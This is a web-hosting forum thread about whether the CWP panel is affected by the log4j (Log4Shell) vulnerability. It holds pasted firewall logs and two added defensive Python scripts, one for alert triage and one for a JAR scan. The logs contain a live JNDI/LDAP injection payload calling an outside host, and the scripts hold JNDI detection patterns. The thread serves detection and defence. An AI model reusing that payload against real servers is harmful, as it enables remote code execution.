Author Topic: log4j security issue  (Read 3002 times)


log4j security issue
« on: December 13, 2021, 09:58:54 AM »
Hi,

Are we affected by the log4j vulnerability, and if yes, when does it get patched?

thanks

Re: log4j security issue
« Reply #1 on: December 13, 2021, 11:15:44 AM »
I second the question. I also do not know whether CWP is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.
Code:
2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
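
A small triage script for alerts like the ones above, added here as an example and not part of the original post: it parses the Suricata eve.json lines (skipping the fast-log text lines, whose `{TCP}` is not JSON), reports which HTTP field carried the `${jndi:` lookup, which host it pointed at, and which alerts the firewall did not block. The sample log is constructed (RFC 5737 addresses), except for the scanner user-agent string, which is the one shown in the post.

```python
import json
import re
from collections import Counter
from typing import Dict, Optional

# Plain "${jndi:" lookups, case-insensitive. The ET/PTsecurity rules that raised the
# alerts cover obfuscated variants; this is a second, cheap pass over what they flagged.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CALLBACK_RE = re.compile(r"(?:ldaps?|rmi|dns)://([^/:\s}]+)", re.IGNORECASE)

# Constructed sample: one fast-log text line plus two eve.json alerts.
SAMPLE_LOG = r'''
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) {TCP} 203.0.113.7:43588 -> 192.0.2.10:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","event_type":"alert","src_ip":"203.0.113.7","src_port":43588,"dest_ip":"192.0.2.10","dest_port":80,"proto":"TCP","alert":{"action":"blocked","signature_id":2034649,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"},"http":{"hostname":"192.0.2.10","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET"}}
2021-12-12T00:58:01 suricata[78162] {"timestamp":"2021-12-12T00:58:01.000000+0100","event_type":"alert","src_ip":"198.51.100.9","src_port":51000,"dest_ip":"192.0.2.10","dest_port":80,"proto":"TCP","alert":{"action":"allowed","signature_id":2034649,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"},"http":{"hostname":"192.0.2.10","url":"/","http_user_agent":"Mozilla/5.0","http_method":"GET"}}
'''

def parse_alert(line: str) -> Optional[dict]:
    """Return the eve.json object from a 'suricata[pid] {...}' line; None for fast-log text."""
    brace = line.find("{")
    if brace < 0:
        return None
    try:
        ev = json.loads(line[brace:])   # fast-log lines fail here on "{TCP}" and are skipped
    except json.JSONDecodeError:
        return None
    return ev if ev.get("event_type") == "alert" else None

def indicators(ev: dict) -> dict:
    """Which HTTP fields carried a JNDI lookup, and which callback host it named."""
    http = ev.get("http", {})
    fields = {k: http.get(k, "") for k in ("url", "http_user_agent", "hostname")}
    hits = {k: v for k, v in fields.items() if JNDI_RE.search(v)}
    callbacks = sorted({m.group(1) for v in hits.values() for m in CALLBACK_RE.finditer(v)})
    return {"src_ip": ev["src_ip"], "dest_port": ev["dest_port"],
            "sid": ev["alert"]["signature_id"], "action": ev["alert"]["action"],
            "jndi_fields": sorted(hits), "callback_hosts": callbacks}

def triage(log_text: str) -> Dict[str, object]:
    """Group alerts by source; flag unblocked ones and ones whose lookup was not in a parsed field."""
    events = [indicators(ev) for ln in log_text.splitlines() if (ev := parse_alert(ln))]
    return {
        "events": events,
        "sources": Counter(e["src_ip"] for e in events),
        "callback_hosts": sorted({h for e in events for h in e["callback_hosts"]}),
        "not_blocked": [e for e in events if e["action"] != "blocked"],
        "needs_review": [e for e in events if not e["jndi_fields"]],   # payload was elsewhere (body, other header)
    }

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LOG), indent=2))
```

Run it against a real `eve.json` by passing the file contents to `triage()`; the `needs_review` list is where to look when a rule fired but none of the parsed HTTP fields shows the lookup.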

Re: log4j security issue
« Reply #2 on: December 13, 2021, 11:32:29 AM »
What log file have you checked for this?

I wanna check on mine also.

thanks

Re: log4j security issue
« Reply #3 on: December 13, 2021, 11:40:31 AM »
External firewall

Re: log4j security issue
« Reply #4 on: December 13, 2021, 06:04:25 PM »
CWP is not using LDAP, log4j or Java.
VPS & Dedicated server provider with included FREE Managed support for CWP.
http://www.studio4host.com/

*** Don't let your server or website go down; choose a hosting provider with expert managed support for your CWP included.

Re: log4j security issue
« Reply #5 on: December 15, 2021, 10:38:53 PM »
The best article I could find about it was this:
https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html

You can check your server with 'syft':
https://github.com/anchore/syft

If there are any Java JARs or classes on your server, they should be checked with 'grype':
https://github.com/anchore/grype

Regards,
Netino
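
Where syft/grype are not available, the check they automate can be done by hand, as in this added example (not part of the post and not the syft or grype code): walk the filesystem, open every JAR/WAR/EAR as a zip, look for `JndiLookup.class`, read the log4j-core version from the bundled Maven `pom.properties`, and compare it against the releases that fixed CVE-2021-44228 (2.15.0, with backports 2.12.2 for Java 7 and 2.3.1 for Java 6). The `demo()` function builds constructed placeholder JARs in a temp directory so it runs without a real log4j on disk.

```python
import os
import re
import tempfile
import zipfile
from typing import List, Optional

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def _vtuple(version: str) -> tuple:  # '2.14.1' -> (2, 14, 1); '-beta9' style tags are dropped
    return tuple(int(x) for x in re.findall(r"\d+", version.split("-")[0]))

def is_affected(version: str) -> bool:
    """True if this log4j-core version predates the CVE-2021-44228 fix (2.15.0 / 2.12.2 / 2.3.1)."""
    v = _vtuple(version)
    if v[:2] == (2, 12):
        return v < (2, 12, 2)
    if v[:2] == (2, 3):
        return v < (2, 3, 1)
    return (2, 0) <= v[:2] < (2, 15)

def inspect_jar(path: str) -> Optional[dict]:
    """Report a JAR only if it ships JndiLookup.class; the version is read from pom.properties."""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
            if JNDI_LOOKUP not in names:
                return None
            props = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
    except zipfile.BadZipFile:
        return None  # not a real archive (or corrupt): skip it rather than abort the scan
    m = re.search(r"^version=(.+)$", props, re.MULTILINE)
    version = m.group(1).strip() if m else None
    # Unknown version is still reported: JndiLookup.class is present and needs a manual look
    return {"path": path, "version": version, "affected": is_affected(version) if version else None}

def scan_tree(root: str) -> List[dict]:
    """Inspect every archive under root; JARs nested inside WAR/EAR files are not unpacked here."""
    hits = [inspect_jar(os.path.join(d, f)) for d, _, fs in os.walk(root) for f in fs
            if f.lower().endswith((".jar", ".war", ".ear"))]
    return sorted((h for h in hits if h), key=lambda h: h["path"])

def demo() -> List[dict]:
    """Build constructed placeholder JARs (no real log4j needed) in a temp dir and scan them."""
    root = tempfile.mkdtemp()
    for name, version in (("log4j-core-2.14.1.jar", "2.14.1"), ("log4j-core-2.17.1.jar", "2.17.1")):
        with zipfile.ZipFile(os.path.join(root, name), "w") as zf:
            zf.writestr(JNDI_LOOKUP, b"")              # placeholder class entry
            zf.writestr(POM_PROPS, f"version={version}\n")
    with zipfile.ZipFile(os.path.join(root, "other.jar"), "w") as zf:
        zf.writestr("com/example/App.class", b"")  # unrelated JAR, must not be reported
    return scan_tree(root)
```

For a real scan, call `scan_tree("/")` (or the web root) as a user that can read the application directories; a hit with `affected: None` means the class is present but the version could not be read and the JAR should be inspected by hand.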